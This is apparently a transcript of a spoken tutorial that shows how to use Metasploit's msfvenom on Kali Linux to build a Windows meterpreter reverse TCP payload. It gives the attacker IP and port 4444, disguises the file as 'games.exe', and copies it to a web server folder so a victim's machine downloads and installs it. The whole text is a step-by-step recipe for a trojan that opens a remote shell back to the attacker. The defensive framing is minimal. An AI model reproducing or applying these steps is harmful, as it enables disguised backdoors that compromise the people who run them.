Now let us use Metasploit to create an exploit. For this, Metasploit is extremely simple, but yet can create extremely powerful exploits to be used on Windows machines. So don't get fooled by the simplicity of it. It can be used to create extremely powerful programs. So let's look at how we can create an executable file on the Windows machine that will be used on the Windows machine, but we will create it within the Metasploit framework. So let's do that by going into MSF console, and we will use a command called msfvenom. I'm running the Metasploit framework on a Kali Linux machine. So if you have a Kali Linux installed on a machine, this Metasploit framework should come installed. If not, you can obviously install it. But let's go in and look at the msfvenom. So I'll type in that, and I can use the -h command to look at what options are available. Once I have the options listed, I'll show you that I can then create -p, which is the first one here on the list, to create a payload exploit. So to do that, I type in msfvenom and I use the -p command, and I'll show you how I put in these particular filters or arguments required for this particular payload we are creating. So let's create a very simple one here by typing in msfvenom. I will use the -p tag for payload. Then I need to use the arguments for the port and the IP address, which will be the IP address of this machine. We want to open a reverse TCP, so I use Windows/meterpreter. Sorry, let me just fix the spelling here. And then I put in reverse_TCP. Then I need to identify the IP address, which is the IP address of this particular machine. This will open a reverse TCP connection from the victim's machine to this attacker's machine. So I need to put in 192.168 for lhost, 192.168.56.102, which is the IP address of this particular machine. I then need to put in the port, so L port, which would be equal to 4444, and I can then put in a template. Let me use the template. I'll just use R for now, capital R, and then let's create the file. We'll call the file games.exe, so R greater than sign, and that will be called games.exe. So this should create a file called games.exe with this particular exploit within that exe file. The next thing we want to do is move that games.exe file. As you'll see here, it has created using the x86 platform for Windows machines. Now I can just list the directory. I then want to copy the games file, the games.exe file, to the folder var www/games, and we'll then use the Windows machine to access this games.exe file and install this payload.